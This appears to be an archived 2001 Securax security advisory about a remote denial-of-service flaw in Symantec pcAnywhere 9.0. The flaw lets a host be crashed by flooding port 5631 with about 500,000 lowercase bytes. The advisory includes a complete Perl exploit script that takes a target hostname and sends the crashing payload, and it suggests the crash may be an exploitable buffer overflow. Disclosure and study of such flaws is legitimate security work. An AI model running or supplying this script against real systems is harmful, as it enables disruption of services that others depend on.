what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

scx-sa-14.txt

scx-sa-14.txt
Posted Feb 14, 2001
Authored by Root-dude | Site securax.org

Securax Security Advisory #14 - Symantec pcAnywhere 9.0 contains a remote denial of service vulnerability. Includes perl exploit.

tags | exploit, remote, denial of service, perl
SHA-256 | f3aabfbdc4849e9d23de5fa5090f05eb0635dac8a1a39400e0f58a1b0dcc758a

scx-sa-14.txt

Change Mirror Download
=============================================================================
Securax-SA-14 Security Advisory
belgian.networking.security Dutch
=============================================================================
Topic: Symantec pcAnywhere 9.0 DoS / Buffer Overflow
Announced: 2001-02-08
Affects: Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE
=============================================================================



Note: This entire advisory has been based upon trial and error results. We
can not ensure the information below is 100% correct being that we do
not have any source code to audit. This document is subject to change
without prior notice.

If you happen to find more information / problems concerning the below
problem or further varients please contact me on the following email
incubus@securax.net, or you can contact info@securax.org.


I. Problem Description
-----------------------

Symantec PcAnywhere is a program that will allow others (who are authorised
to have access :)) to use your pc. It's simular to a Windows NT 4.0 terminal
server.

PcAnywhere (when it's configured to 'be a host pc') listens on 2 ports, 5631
(pcanywheredata, according to nmap) and 65301 (pcanywhere). And when a user
sends certain data in a particular way, pcAnywhere will crash.

When a large amount (it depends, sometimes the host will go down with 320k
characters, sometimes, you will have to send 500k bytes of data) are sent to
a 'waiting' host on the pcanywheredata port, "AWHOST32.EXE" will crash, and
give an error on the screen, and write the "Unexpected program error" to a
logfile. (with EAX, EBX, ... so read them, you'll find the yummy 0x61616161)

Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on them.

Why no exploit, just a lame Denial of Service?

1.) because I suck in win32 debugging / overflowing (but i'm reading)
/* so if I can overflow win32 progs, i'll code an exploit */
2.) as the amount of data is variable, it's hard to overflow..

The DoS code:

<--bof-->

#!/usr/bin/perl

# Symantec PcAnywhere 9.0 Denial of Service
# -----------------------------------------
# by incubus <incubus@securax.net>
# https://www.hexyn.be
#
# https://www.securax.net
# All my love to Tessa.
# Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
# Zym0tic, segfault, #securax@irc.hexyn.be
# Thanks to jurgen swennen, for letting me (ab)use his computer.
#
# this is intended as proof of concept, do not abuse!

use IO::Socket;
$host = "$ARGV[0]";
$port = 5631;
if ($#ARGV<0) {
print "use it like: $0 <hostname>\n";
exit();
}
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
PeerPort=>$port) || die "damn, ";
print "hello\n";
$buf = "";
for($counter = 0; $counter < 500000; $counter++) {
$buf .= "\x61";
}
print $socket "$buf\n";
close($socket);
exit();

<--eof-->


II. Impact
----------

If someone exploits this, than Symantec is forced to rename the name of this
product to PcAnyoneAnywhere or something...

No, seriously, this could lead to a compromise of a system.


III. possible workarounds
-------------------------

This advisory was also sent to Symantec (info@symantec.com), we'll see what
they do with it...

IV credits
----------
love to Tessa.
greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t,
and so many, many others I forgot...


=============================================================================
For more information incubus@securax.org
Website https://www.securax.org
Advisories/Text https://www.securax.org/pers
-----------------------------------------------------------------------------

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close